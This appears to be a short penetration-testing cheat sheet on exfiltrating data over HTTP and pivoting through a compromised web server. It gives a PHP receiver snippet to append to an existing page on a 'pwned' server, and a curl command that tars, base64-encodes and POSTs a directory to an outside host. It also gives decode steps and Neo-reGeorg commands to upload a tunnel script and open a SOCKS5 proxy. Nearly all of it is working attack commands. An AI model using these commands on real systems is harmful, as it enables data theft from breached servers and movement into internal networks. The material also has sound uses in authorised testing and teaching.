# HTTP/PHP Exfiltration

* On a pwned web server concat the following PHP code to an existing page
```php
<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/out.b64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>
```

* POST the payload to the controlled web server
```sh
curl --data "file=$(tar zcf - <directory> | base64)" http://example.com/about.php
```

* Prepare the stored file through removing the url encoding
```sh
sudo sed -i 's/ /+/g' /tmp/out.b64
```

* Unarchive the data
```sh
cat /tmp/out.b64 | base64 -d | tar xvfz -
```

## Pivot via Tunneling over HTTP

* [Neo-reGeorg's tool](https://github.com/L-codes/Neo-reGeorg)

* Generate an encrypted client with a key via
```sh
python3 neoreg.py generate -k key.enc
```

* Upload `tunnel.php` to the web server created
* Trigger the tunnel via
```sh
python3 neoreg.py -k key.enc -u http://example.com/tunnel.php
```

* Start socks5 via
```sh
curl --socks5 127.0.0.1:1080 http://target.example.com
```